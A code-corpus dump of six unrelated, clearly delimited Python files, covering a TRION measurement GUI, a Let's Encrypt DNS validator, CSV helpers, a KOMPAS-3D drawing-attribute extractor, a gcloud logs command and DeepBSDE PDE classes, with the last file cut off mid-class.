trionet/python/TN_TrionMeasure/tn_trion_measure_qt.py | DEWETRON/trion_sdk | 1 | 12761601 | #! /bin/env python3
# Copyright DEWETRON GmbH 2019
import sys
import time
sys.path.append('../../../trion_api/python')
# Import the core and GUI elements of Qt
from PySide2.QtCore import Qt, QObject, QPointF, QTimer, Slot, Signal, QThread
from PySide2 import QtGui
from PySide2.QtWidgets import *
from PySide2.QtCharts import *
from dewepxi_load import *
from dewepxi_apicore import *
from xml.etree import ElementTree as et
class MainDialog(QWidget):
"""
Sample main window
"""
def __init__(self, parent=None):
super(MainDialog, self).__init__(parent)
self.chart = QtCharts.QChart()
self.chart.setAnimationOptions(QtCharts.QChart.NoAnimation)
self.worker = TrionMeasurementWorker(self)
self.worker.signal_show_message.connect(self.showStatus, Qt.QueuedConnection)
self.worker.add_channel_data.connect(self.addChannelData, Qt.QueuedConnection)
self.chart_series = dict()
self.setupGUI()
self.redrawChart()
def setupGUI(self):
self.setWindowTitle("TRION Measure qt")
self.groupbox_api_selection = QGroupBox("&Select API", self)
self.api_trion_api = QRadioButton("&TRION", self)
self.api_trionet_api = QRadioButton("&TRIONet", self)
layout = QHBoxLayout()
layout.addWidget(self.api_trion_api)
layout.addWidget(self.api_trionet_api)
self.groupbox_api_selection.setLayout(layout)
self.groupbox_board_selection = QGroupBox("&Select Board", self)
self.cb_trion_board = QComboBox()
layout = QVBoxLayout()
layout.addWidget(self.cb_trion_board)
self.groupbox_board_selection.setLayout(layout)
self.groupbox_channel_selection = QGroupBox("&Select Channel", self)
self.cb_channel = QComboBox()
layout = QVBoxLayout()
layout.addWidget(self.cb_channel)
self.groupbox_channel_selection.setLayout(layout)
self.groupbox_channel_config = QGroupBox("&Channel Config", self)
self.cb_range = QComboBox()
self.cb_sample_rate = QComboBox()
layout = QHBoxLayout()
layout.addWidget(self.cb_range)
layout.addWidget(self.cb_sample_rate)
self.groupbox_channel_config.setLayout(layout)
self.statusbar = QStatusBar(self)
self.statuslabel = QLabel("Status", self)
self.statuslabel.setFrameStyle(QFrame.Panel | QFrame.Sunken)
self.statusbar.addPermanentWidget(self.statuslabel, 1)
groupbox_chart = QGroupBox("Channel Data", self)
self.chart_view = QtCharts.QChartView(self.chart)
self.chart_view.setRenderHint(QtGui.QPainter.Antialiasing)
self.chart_view.setMinimumSize(400, 200)
layout = QVBoxLayout()
layout.addWidget(self.chart_view)
groupbox_chart.setLayout(layout)
def onApiChanged():
if self.api_trion_api.isChecked():
self.worker.selectAPI("TRION")
elif self.api_trionet_api.isChecked():
self.worker.selectAPI("TRIONET")
self.api_trion_api.toggled.connect(onApiChanged)
self.api_trion_api.setChecked(True)
main_layout = QVBoxLayout()
main_layout.addWidget(self.groupbox_api_selection)
main_layout.addWidget(self.groupbox_board_selection)
main_layout.addWidget(self.groupbox_channel_selection)
main_layout.addWidget(self.groupbox_channel_config)
main_layout.addWidget(groupbox_chart)
main_layout.addWidget(self.statusbar)
self.setLayout(main_layout)
@Slot(str, str)
def showStatus(self, text, style = "color:black"):
"""
show text in status bar
"""
self.statuslabel.setText(text)
self.statuslabel.setStyleSheet(style)
def initChart(self):
self.chart.removeAllSeries()
for axis in self.chart.axes(Qt.Horizontal): self.chart.removeAxis(axis)
for axis in self.chart.axes(Qt.Vertical): self.chart.removeAxis(axis)
def redrawChart(self):
self.initChart()
def addChannelData(self, channel_data_list):
"""
Add new sample block
"""
self.chart.removeAllSeries()
series = QtCharts.QLineSeries()
series.append(channel_data_list)
self.chart.addSeries(series)
class TrionMeasurementWorker(QThread):
"""
Measurement worker thread
"""
signal_show_message = Signal(str, str)
add_channel_data = Signal(list)
def __init__(self, parent=None):
"""
constructor
"""
QThread.__init__(self, parent)
self.gui = parent
self.exiting = False
self.is_api_loaded = False
self.board_id = 0
def run(self):
"""
ACQ loop
"""
self.configureChannel()
self.configureAcquisition()
nReadPos = 0
nAvailSamples = 0
nRawData = 0
sample_index = 0
# Get detailed information about the ring buffer
# to be able to handle the wrap around
[nErrorCode, nBufEndPos] = DeWeGetParam_i64( self.board_id, CMD_BUFFER_END_POINTER)
[nErrorCode, nBufSize] = DeWeGetParam_i32( self.board_id, CMD_BUFFER_TOTAL_MEM_SIZE)
nErrorCode = DeWeSetParam_i32( self.board_id, CMD_START_ACQUISITION, 0)
while self.exiting==False:
# Get the number of samples already stored in the ring buffer
[nErrorCode, nAvailSamples] = DeWeGetParam_i32( self.board_id, CMD_BUFFER_AVAIL_NO_SAMPLE)
if nAvailSamples > 0:
# Get the current read pointer
[nErrorCode, nReadPos] = DeWeGetParam_i64( self.board_id, CMD_BUFFER_ACT_SAMPLE_POS)
channel_data = []
# Read the current samples from the ring buffer
for i in range(0, nAvailSamples):
# Get the sample value at the read pointer of the ring buffer
nRawData = DeWeGetSampleData(nReadPos)
# Print the sample value
# print(nRawData)
# sys.stdout.flush()
channel_data.append(QPointF(sample_index, nRawData))
sample_index += 1
# Increment the read pointer
nReadPos = nReadPos + 4
# Handle the ring buffer wrap around
if nReadPos > nBufEndPos:
nReadPos -= nBufSize
# Free the ring buffer after read of all values
nErrorCode = DeWeSetParam_i32( self.board_id, CMD_BUFFER_FREE_NO_SAMPLE, nAvailSamples)
self.addChannelData(channel_data)
# wait for 100ms
time.sleep(0.1)
nErrorCode = DeWeSetParam_i32( self.board_id, CMD_STOP_ACQUISITION, 0)
def startWorker(self):
"""
Start worker thread
"""
if not self.isRunning():
self.start()
def stopWorker(self):
"""
Stop worker thread
"""
if self.isRunning():
self.exiting = True
self.terminate()
def selectAPI(self, api_name):
"""
Select and load TRION or TRIONET api.
"""
self.stopWorker()
if self.is_api_loaded:
DeWeSetParam_i32(0, CMD_CLOSE_BOARD_ALL, 0)
DeWeDriverDeInit()
DeWePxiUnload()
if not DeWePxiLoad(api_name):
if api_name == "TRION":
self.showStatus("dwpxi_api.dll could not be found.")
if api_name == "TRIONET":
self.showStatus("dwpxi_netapi.dll could not be found.")
return
self.is_api_loaded = True
self.api_backend_name = api_name
self.initTrion()
self.startWorker()
def initTrion(self):
"""
Initialize TRION (or TRIONET)
"""
if self.isRunning():
self.showStatus("initTrion not possible with active worker thread")
return
[nErrorCode, nNoOfBoards] = DeWeDriverInit()
if abs(nNoOfBoards) == 0:
self.showStatus("No Trion cards found")
elif nNoOfBoards < 0:
self.showStatus("%d Trion cards found (Simulation)" % abs(nNoOfBoards))
else:
self.showStatus("%d Trion cards found" % nNoOfBoards)
self.gui.cb_trion_board.clear()
self.gui.cb_channel.clear()
num_boards = abs(nNoOfBoards)
if num_boards > 0:
nErrorCode = DeWeSetParam_i32(0, CMD_OPEN_BOARD_ALL, 0)
nErrorCode = DeWeSetParam_i32(0, CMD_RESET_BOARD_ALL, 0)
for i in range(num_boards):
[nErrorCode, board_name] = DeWeGetParamStruct_str("BoardID%d" % i, "BoardName")
if len(board_name) == 0:
board_name = "Unknown board"
self.gui.cb_trion_board.addItem("%d: %s " % ( i, board_name))
[nErrorCode, board_prop_xml] = DeWeGetParamStruct_str("BoardID%d" % i, "BoardProperties")
prop_doc = et.fromstring(board_prop_xml)
elem_list = prop_doc.findall("ChannelProperties/*")
for elem in elem_list:
if elem.tag != "XMLVersion":
# add channel names
self.gui.cb_channel.addItem(elem.tag)
def configureAcquisition(self):
"""
configure Acquisition setup
"""
# Set configuration to use one board in standalone operation
target = "BoardID%d/AcqProp" % self.board_id
nErrorCode = DeWeSetParamStruct_str( target, "OperationMode", "Slave")
nErrorCode = DeWeSetParamStruct_str( target, "ExtTrigger", "False")
nErrorCode = DeWeSetParamStruct_str( target, "ExtClk", "False")
nErrorCode = DeWeSetParam_i32(self.board_id, CMD_BUFFER_BLOCK_SIZE, 200)
nErrorCode = DeWeSetParam_i32(self.board_id, CMD_BUFFER_BLOCK_COUNT, 50)
nErrorCode = DeWeSetParam_i32(self.board_id, CMD_UPDATE_PARAM_ALL, 0)
def configureChannel(self):
"""
configureChannel
(has to be called before configureAcquisition)
"""
nErrorCode = DeWeSetParamStruct_str( "BoardID0/AIAll", "Used", "False")
nErrorCode = DeWeSetParamStruct_str( "BoardID0/AI0", "Used", "True")
def showStatus(self, text, style = "color:black"):
"""
show text in status bar
"""
self.signal_show_message.emit(text, style)
def addChannelData(self, channel_data):
"""
add samples to graph
"""
self.add_channel_data.emit(channel_data)
if __name__ == "__main__":
app = QApplication(sys.argv)
widget = MainDialog()
widget.show()
ret = app.exec_()
widget.worker.stopWorker()
sys.exit(ret)
| 1.835938 | 2 |
letsencrypt/validator.py | josiasjuniorx/letsencrypt_requester | 0 | 12761602 | <reponame>josiasjuniorx/letsencrypt_requester<gh_stars>0
#! /usr/bin/python
# -*- coding: utf-8 -*-
import time, logging
from oper_status_json import *
from api_dns import *
from dns_query import *
from sys import argv
from etc.settings import schema_json, intervalo, max_retry, status_json_dir
chall_hash = os.getenv('CERTBOT_VALIDATION')
dominio = os.getenv('CERTBOT_DOMAIN')
chall_url = ("_acme-challenge.%s" % dominio)
dominio_raiz = retorna_root_domain(dominio)
status_path = argv[1]
logging.basicConfig(filename='/tmp/validator.log', level=logging.DEBUG)
def verify_hash(chall_hash, chall_url=chall_url):
logging.info('verificando hash: %s url: %s' % (chall_hash, chall_url))
status_json['nameservers'] = retorna_lista_ns(dominio)
return_hash = retorna_lista_txt(chall_url)
logging.info('hash encontrados no dns: %s' % (return_hash))
if chall_hash in return_hash:
status_json['entrada TXT atual'] = return_hash
write_status_json(status_json, json_file)
return True
else:
status_json['entrada TXT atual'] = return_hash
write_status_json(status_json, json_file)
return False
def hash_validation(status_json, json_file, chall_url=chall_url):
logging.info('hash validation...')
status_json['status'] = 'validando hash'
status_json['validando dominio'] = dominio
status_json[u'hash de validação'] = chall_hash
status_json['challenge url'] = chall_url
status_json['tentativas'] = 00
write_status_json(status_json, json_file)
while verify_hash(chall_hash) == False and status_json['tentativas'] < max_retry:
time.sleep(intervalo)
status_json['tentativas'] += 01
write_status_json(status_json, json_file)
if status_json['tentativas'] == max_retry:
status_json['status'] = 'max retry'
status_json['erro'] = 'atingido número máximo de tentativas'
write_status_json(status_json, json_file)
else:
status_json['status'] = 'verificação concluída'
write_status_json(status_json, json_file)
del_status_json('entrada TXT atual', json_file)
del_status_json('tentativas', json_file)
del_status_json(u'hash de validação', json_file)
del_status_json(u'nameservers', json_file)
del_status_json('challenge url', json_file)
del_status_json('validando dominio', json_file)
if __name__ == '__main__':
json_file = create_file(status_path, schema_json, status_json_dir)
logging.info("""iniciando o validator\n
dominio: %s
dominio_raiz: %s
chall_hash: %s
chall_url: %s
json_file: %s
""" % (dominio, dominio_raiz, chall_hash, chall_url, json_file))
status_json = read_status_json(json_file)
status_json['status'] = 'Criando entrada no DNS'
write_status_json(status_json, json_file)
create_dns_hash = criar_entrada(dominio_raiz, chall_url, 'txt', chall_hash)
logging.info('criando entrada dns %s' % create_dns_hash['mensagem'])
status_json['criação da entrada no dns'] = create_dns_hash['mensagem']
logging.info('escrevendo no arquivo: %s' % json_file)
write_status_json(status_json, json_file)
hash_validation(status_json, json_file)
| 2.25 | 2 |
custom_csv.py | jbenjoseph/GitGeo | 11 | 12761603 | <reponame>jbenjoseph/GitGeo
"""Custom CSV-related functionality."""
# pylint: disable=too-many-arguments, bad-continuation
import csv
import os
def create_csv(results_type, timestamp):
"""Create new csv to store GitGeo results.
Delete any existing csv and the create new csv.
Args:
results_type - a string indicating by contributor or by country
timestamp - datetime to create unique file name
Returns:
None
"""
filename = os.path.join("results", results_type + "_" + timestamp + ".csv")
# Create new csv file with column names
with open(filename, "w", encoding="utf-8", newline="") as file:
fieldnames = ["software_name", "username", "location", "country"]
writer = csv.DictWriter(file, fieldnames=fieldnames)
writer.writeheader()
def add_committer_to_csv(
results_type, software_name, timestamp, username, location, country
):
"""Write committer info to existing csv file.
Use to create dataset of location data for analysis.
Args:
results_type - a string indicating by contributor or by country
software_name - package name or github name
timestamp - datetime to append to unique existing file
username - GitHub username
location - Geographic info from GitHub profile
country - country predicted by GitGeo
Returns:
null
"""
# replace slashes to avoid incorrect creation of directories
software_name = software_name.replace("/", "_")
filename = os.path.join("results", results_type + "_" + timestamp + ".csv")
# newline='' prevents spaces in between entries. Setting encoding to utf-8
# ensures that most (all?) characters can be read. "a" is for append.
with open(filename, "a", encoding="utf-8", newline="") as file:
fieldnames = ["software_name", "username", "location", "country"]
writer = csv.DictWriter(file, fieldnames=fieldnames)
writer.writerow(
{
"software_name": software_name,
"username": username,
"location": location,
"country": country,
}
)
| 3.109375 | 3 |
GetDocumentsAttribByPathForIzv.py | PKEv/ScriptsForKompas3D | 0 | 12761604 | import os
import re
import subprocess
import pythoncom
from win32com.client import Dispatch, gencache
from tkinter import Tk
# from tkinter.filedialog import askopenfilenames
from tkinter import filedialog
# Подключение к API7 программы Компас 3D
def get_kompas_api7():
module = gencache.EnsureModule("{69AC2981-37C0-4379-84FD-5DD2F3C0A520}", 0, 1, 0)
api = module.IKompasAPIObject(
Dispatch("Kompas.Application.7")._oleobj_.QueryInterface(module.IKompasAPIObject.CLSID,
pythoncom.IID_IDispatch))
const = gencache.EnsureModule("{75C9F5D0-B5B8-4526-8681-9903C567D2ED}", 0, 1, 0).constants
return module, api, const
# Функция проверки, запущена-ли программа КОМПАС 3D
def is_running():
proc_list = \
subprocess.Popen('tasklist /NH /FI "IMAGENAME eq KOMPAS*"', shell=False, stdout=subprocess.PIPE).communicate()[0]
return True if proc_list else False
# Посчитаем количество листов каждого из формата
def amount_sheet(doc7):
sheets = {"A0": 0, "A1": 0, "A2": 0, "A3": 0, "A4": 0, "A5": 0}
for sheet in range(doc7.LayoutSheets.Count):
format = doc7.LayoutSheets.Item(sheet).Format # sheet - номер листа, отсчёт начинается от 0
sheets["A" + str(format.Format)] += 1 * format.FormatMultiplicity
return sheets
# Прочитаем основную надпись чертежа
def stamp(doc7):
for sheet in range(doc7.LayoutSheets.Count):
style_filename = os.path.basename(doc7.LayoutSheets.Item(sheet).LayoutLibraryFileName)
style_number = int(doc7.LayoutSheets.Item(sheet).LayoutStyleNumber)
if style_filename.lower() == 'graphic.lyt' and style_number in [1, 3]:
stamp = doc7.LayoutSheets.Item(sheet).Stamp
return {"Scale": re.findall(r"\d+:\d+", stamp.Text(6).Str)[0],
"FirstUsage": stamp.Text(25).Str, # Первичное применение
"Checked": stamp.Text(111).Str,
"TChecked": stamp.Text(112).Str,
"NChecked": stamp.Text(114).Str,
"Approved": stamp.Text(115).Str, # Утвердил
"Number": stamp.Text(2).Str, # Номер документа
"Material": stamp.Text(3).Str, # Материал
"Designer": stamp.Text(110).Str}
# Форматка для перечней элементов
elif style_filename.lower() == 'eskw_gr.lyt' and style_number == 60:
stamp = doc7.LayoutSheets.Item(sheet).Stamp
return {"Scale": re.findall(r"\d+:\d+", stamp.Text(6).Str)[0],
"FirstUsage": stamp.Text(25).Str, # Первичное применение
"Checked": stamp.Text(111).Str,
"TChecked": stamp.Text(112).Str,
"NChecked": stamp.Text(114).Str,
"Approved": stamp.Text(115).Str, # Утвердил
"Number": stamp.Text(2).Str, # Номер документа
"Material": stamp.Text(3).Str, # Материал
"Designer": stamp.Text(110).Str}
elif style_filename.lower() == 'graphic.lyt' and style_number in [17, 51]:
stamp = doc7.LayoutSheets.Item(sheet).Stamp # обработка спецификаций и групповых спецификаций
return {
"FirstUsage": stamp.Text(25).Str, # Первичное применение
"Checked": stamp.Text(111).Str,
"TChecked": stamp.Text(112).Str,
"NChecked": stamp.Text(114).Str,
"Approved": stamp.Text(115).Str, # Утвердил
"Number": stamp.Text(2).Str, # Номер документа
# "Material": stamp.Text(3).Str, # Материал
"Designer": stamp.Text(110).Str}
return {}
def specWork(doc7):
IDrawingDocument = doc7._oleobj_.QueryInterface(module7.NamesToIIDMap['IDrawingDocument'], pythoncom.IID_IDispatch)
def parse_design_documents(paths):
is_run = is_running() # True, если программа Компас уже запущена
module7, api7, const7 = get_kompas_api7() # Подключаемся к программе
app7 = api7.Application # Получаем основной интерфейс программы
app7.Visible = True # Показываем окно пользователю (если скрыто)
app7.HideMessage = const7.ksHideMessageNo # Отвечаем НЕТ на любые вопросы программы
table = [] # Создаём таблицу парметров
for path in paths:
print("Чтение файла: " + path + "\n")
doc7 = app7.Documents.Open(PathName=path,
Visible=False,
ReadOnly=True) # Откроем файл в видимом режиме без права его изменять
row = amount_sheet(doc7) # Посчитаем кол-во листов каждого формат
row.update(stamp(doc7)) # Читаем основную надпись
row.update({
"Filename": doc7.Name, # Имя файла
})
table.append(row) # Добавляем строку параметров в таблицу
doc7.Close(const7.kdDoNotSaveChanges) # Закроем файл без изменения
if not is_run: app7.Quit() # Закрываем программу при необходимости
return table
def getKeyFromDict(myDict, myKey):
return myDict[myKey] if (myKey) in myDict else ""
def print_to_excel(result):
excel = Dispatch("Excel.Application") # Подключаемся к программе Excel
excel.Visible = True # Делаем окно видимым
wb = excel.Workbooks.Add() # Добавляем новую книгу
sheet = wb.ActiveSheet # Получаем ссылку на активный лист
# Создаём заголовок таблицы
sheet.Range("A1:Q1").value = ["Имя файла", "Разработчик",
"Проверил", "Т.Контр.", "Н.Контр.", "Утвердил",
"Перв.Прим.", "Децимальный номер", "Материал",
"Кол-во размеров", "Кол-во пунктов ТТ",
"А0", "А1", "А2", "А3", "А4", "Масштаб"]
# Заполняем таблицу
for i, row in enumerate(result):
sheet.Cells(i + 2, 1).value = row['Filename']
sheet.Cells(i + 2, 2).value = getKeyFromDict(row, 'Designer')
sheet.Cells(i + 2, 3).value = getKeyFromDict(row, 'Checked')
sheet.Cells(i + 2, 4).value = getKeyFromDict(row, 'TChecked')
sheet.Cells(i + 2, 5).value = getKeyFromDict(row, 'NChecked')
sheet.Cells(i + 2, 6).value = getKeyFromDict(row, 'Approved')
sheet.Cells(i + 2, 7).value = getKeyFromDict(row, 'FirstUsage')
sheet.Cells(i + 2, 8).value = getKeyFromDict(row, 'Number')
sheet.Cells(i + 2, 9).value = getKeyFromDict(row, 'Material')
sheet.Cells(i + 2, 10).value = getKeyFromDict(row, 'CountDim')
sheet.Cells(i + 2, 11).value = getKeyFromDict(row, 'CountTD')
sheet.Cells(i + 2, 12).value = getKeyFromDict(row, 'A0')
sheet.Cells(i + 2, 13).value = getKeyFromDict(row, 'A1')
sheet.Cells(i + 2, 14).value = getKeyFromDict(row, 'A2')
sheet.Cells(i + 2, 15).value = getKeyFromDict(row, 'A3')
sheet.Cells(i + 2, 16).value = getKeyFromDict(row, 'A4')
sheet.Cells(i + 2, 17).value = "".join(('="', row['Scale'], '"')) if ('Scale') in row else ""
def getFilesFromDir(dirName, listNames):
names = os.listdir(dirName)
for name in names:
fullname = os.path.join(dirName, name).replace("\\", "/") # получаем полное имя
ext = os.path.splitext(fullname)[1][1:]
if os.path.isfile(fullname) and ext == "cdw" :
listNames.append(fullname)
elif os.path.isdir(fullname):
listNames = getFilesFromDir(fullname, listNames)
return listNames
if __name__ == "__main__":
root = Tk()
root.withdraw() # Скрываем основное окно и сразу окно выбора файлов
dirName = filedialog.askdirectory()
print("Каталог поиска файлов " + dirName + "\n")
listNames = []
filenames = getFilesFromDir(dirName, listNames)
# Исключаем файлы в каталогах old
filenames = [filename for filename in filenames if filename.find('/old/') == -1]
table = []
if len(filenames) != 0:
table += (parse_design_documents(filenames))
else:
print("Нет файлов чертежей")
# Вывод отчёта
print_to_excel(table)
root.destroy() # Уничтожаем основное окно
root.mainloop()
| 2.09375 | 2 |
lib/surface/app/logs/read.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2 | 12761605 | # -*- coding: utf-8 -*- #
# Copyright 2015 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""app logs read command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.app import logs_util
from googlecloudsdk.api_lib.logging import common
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
class Read(base.Command):
"""Reads log entries for the current App Engine app."""
@staticmethod
def Args(parser):
"""Register flags for this command."""
flags.SERVICE.AddToParser(parser)
flags.VERSION.AddToParser(parser)
flags.LEVEL.AddToParser(parser)
flags.LOGS.AddToParser(parser)
parser.add_argument('--limit', required=False, type=int,
default=200, help='Number of log entries to show.')
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
The list of log entries.
"""
printer = logs_util.LogPrinter()
printer.RegisterFormatter(logs_util.FormatRequestLogEntry)
printer.RegisterFormatter(logs_util.FormatNginxLogEntry)
printer.RegisterFormatter(logs_util.FormatAppEntry)
project = properties.VALUES.core.project.Get(required=True)
filters = logs_util.GetFilters(project, args.logs, args.service,
args.version, args.level)
lines = []
# pylint: disable=g-builtin-op, For the .keys() method
for entry in common.FetchLogs(log_filter=' AND '.join(filters),
order_by='DESC',
limit=args.limit):
lines.append(printer.Format(entry))
for line in reversed(lines):
log.out.Print(line)
Read.detailed_help = {
'DESCRIPTION': """\
Display the latest log entries from stdout, stderr and crash log for the
current Google App Engine app in a human readable format. This command
requires that the caller have the logging.logEntries.list
permission.
""",
'EXAMPLES': """\
To display the latest entries for the current app, run:
$ {command}
To show only the entries with severity at `warning` or higher, run:
$ {command} --level=warning
To show only the entries with a specific version, run:
$ {command} --version=v1
To show only the 10 latest log entries for the default service, run:
$ {command} --limit=10 --service=default
To show only the logs from the request log for standard apps, run:
$ {command} --logs=request_log
To show only the logs from the request log for Flex apps, run:
$ {command} --logs=nginx.request
""",
}
| 2.21875 | 2 |
equation.py | NYU-CDS-Capstone-FBSDE/DeepBSDE | 205 | 12761606 | <reponame>NYU-CDS-Capstone-FBSDE/DeepBSDE
import numpy as np
import tensorflow as tf
class Equation(object):
"""Base class for defining PDE related function."""
def __init__(self, eqn_config):
self.dim = eqn_config.dim
self.total_time = eqn_config.total_time
self.num_time_interval = eqn_config.num_time_interval
self.delta_t = self.total_time / self.num_time_interval
self.sqrt_delta_t = np.sqrt(self.delta_t)
self.y_init = None
def sample(self, num_sample):
"""Sample forward SDE."""
raise NotImplementedError
def f_tf(self, t, x, y, z):
"""Generator function in the PDE."""
raise NotImplementedError
def g_tf(self, t, x):
"""Terminal condition of the PDE."""
raise NotImplementedError
class HJBLQ(Equation):
"""HJB equation in PNAS paper doi.org/10.1073/pnas.1718942115"""
def __init__(self, eqn_config):
super(HJBLQ, self).__init__(eqn_config)
self.x_init = np.zeros(self.dim)
self.sigma = np.sqrt(2.0)
self.lambd = 1.0
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + self.sigma * dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
return -self.lambd * tf.reduce_sum(tf.square(z), 1, keepdims=True)
def g_tf(self, t, x):
return tf.math.log((1 + tf.reduce_sum(tf.square(x), 1, keepdims=True)) / 2)
class AllenCahn(Equation):
"""Allen-Cahn equation in PNAS paper doi.org/10.1073/pnas.1718942115"""
def __init__(self, eqn_config):
super(AllenCahn, self).__init__(eqn_config)
self.x_init = np.zeros(self.dim)
self.sigma = np.sqrt(2.0)
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + self.sigma * dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
return y - tf.pow(y, 3)
def g_tf(self, t, x):
return 0.5 / (1 + 0.2 * tf.reduce_sum(tf.square(x), 1, keepdims=True))
class PricingDefaultRisk(Equation):
"""
Nonlinear Black-Scholes equation with default risk in PNAS paper
doi.org/10.1073/pnas.1718942115
"""
def __init__(self, eqn_config):
super(PricingDefaultRisk, self).__init__(eqn_config)
self.x_init = np.ones(self.dim) * 100.0
self.sigma = 0.2
self.rate = 0.02 # interest rate R
self.delta = 2.0 / 3
self.gammah = 0.2
self.gammal = 0.02
self.mu_bar = 0.02
self.vh = 50.0
self.vl = 70.0
self.slope = (self.gammah - self.gammal) / (self.vh - self.vl)
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = (1 + self.mu_bar * self.delta_t) * x_sample[:, :, i] + (
self.sigma * x_sample[:, :, i] * dw_sample[:, :, i])
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
piecewise_linear = tf.nn.relu(
tf.nn.relu(y - self.vh) * self.slope + self.gammah - self.gammal) + self.gammal
return (-(1 - self.delta) * piecewise_linear - self.rate) * y
def g_tf(self, t, x):
return tf.reduce_min(x, 1, keepdims=True)
class PricingDiffRate(Equation):
"""
Nonlinear Black-Scholes equation with different interest rates for borrowing and lending
in Section 4.4 of Comm. Math. Stat. paper doi.org/10.1007/s40304-017-0117-6
"""
def __init__(self, eqn_config):
super(PricingDiffRate, self).__init__(eqn_config)
self.x_init = np.ones(self.dim) * 100
self.sigma = 0.2
self.mu_bar = 0.06
self.rl = 0.04
self.rb = 0.06
self.alpha = 1.0 / self.dim
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
factor = np.exp((self.mu_bar-(self.sigma**2)/2)*self.delta_t)
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = (factor * np.exp(self.sigma * dw_sample[:, :, i])) * x_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
temp = tf.reduce_sum(z, 1, keepdims=True) / self.sigma
return -self.rl * y - (self.mu_bar - self.rl) * temp + (
(self.rb - self.rl) * tf.maximum(temp - y, 0))
def g_tf(self, t, x):
temp = tf.reduce_max(x, 1, keepdims=True)
return tf.maximum(temp - 120, 0) - 2 * tf.maximum(temp - 150, 0)
class BurgersType(Equation):
"""
Multidimensional Burgers-type PDE in Section 4.5 of Comm. Math. Stat. paper
doi.org/10.1007/s40304-017-0117-6
"""
def __init__(self, eqn_config):
super(BurgersType, self).__init__(eqn_config)
self.x_init = np.zeros(self.dim)
self.y_init = 1 - 1.0 / (1 + np.exp(0 + np.sum(self.x_init) / self.dim))
self.sigma = self.dim + 0.0
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + self.sigma * dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
return (y - (2 + self.dim) / 2.0 / self.dim) * tf.reduce_sum(z, 1, keepdims=True)
def g_tf(self, t, x):
return 1 - 1.0 / (1 + tf.exp(t + tf.reduce_sum(x, 1, keepdims=True) / self.dim))
class QuadraticGradient(Equation):
"""
An example PDE with quadratically growing derivatives in Section 4.6 of Comm. Math. Stat. paper
doi.org/10.1007/s40304-017-0117-6
"""
def __init__(self, eqn_config):
super(QuadraticGradient, self).__init__(eqn_config)
self.alpha = 0.4
self.x_init = np.zeros(self.dim)
base = self.total_time + np.sum(np.square(self.x_init) / self.dim)
self.y_init = np.sin(np.power(base, self.alpha))
def sample(self, num_sample):
dw_sample = np.random.normal(size=[num_sample, self.dim, self.num_time_interval]) * self.sqrt_delta_t
x_sample = np.zeros([num_sample, self.dim, self.num_time_interval + 1])
x_sample[:, :, 0] = np.ones([num_sample, self.dim]) * self.x_init
for i in range(self.num_time_interval):
x_sample[:, :, i + 1] = x_sample[:, :, i] + dw_sample[:, :, i]
return dw_sample, x_sample
def f_tf(self, t, x, y, z):
x_square = tf.reduce_sum(tf.square(x), 1, keepdims=True)
base = self.total_time - t + x_square / self.dim
base_alpha = tf.pow(base, self.alpha)
derivative = self.alpha * tf.pow(base, self.alpha - 1) * tf.cos(base_alpha)
term1 = tf.reduce_sum(tf.square(z), 1, keepdims=True)
term2 = -4.0 * (derivative ** 2) * x_square / (self.dim ** 2)
term3 = derivative
term4 = -0.5 * (
2.0 * derivative + 4.0 / (self.dim ** 2) * x_square * self.alpha * (
(self.alpha - 1) * tf.pow(base, self.alpha - 2) * tf.cos(base_alpha) - (
self.alpha * tf.pow(base, 2 * self.alpha - 2) * tf.sin(base_alpha)
)
)
)
return term1 + term2 + term3 + term4
def g_tf(self, t, x):
return tf.sin(
tf.pow(tf.reduce_sum(tf.square(x), 1, keepdims=True) / self.dim, self.alpha))
class ReactionDiffusion(Equation):
"""
Time-dependent reaction-diffusion-type example PDE in Section 4.7 of Comm. Math. Stat. paper
doi.org/10.1007/s40304-017-0117-6
"""
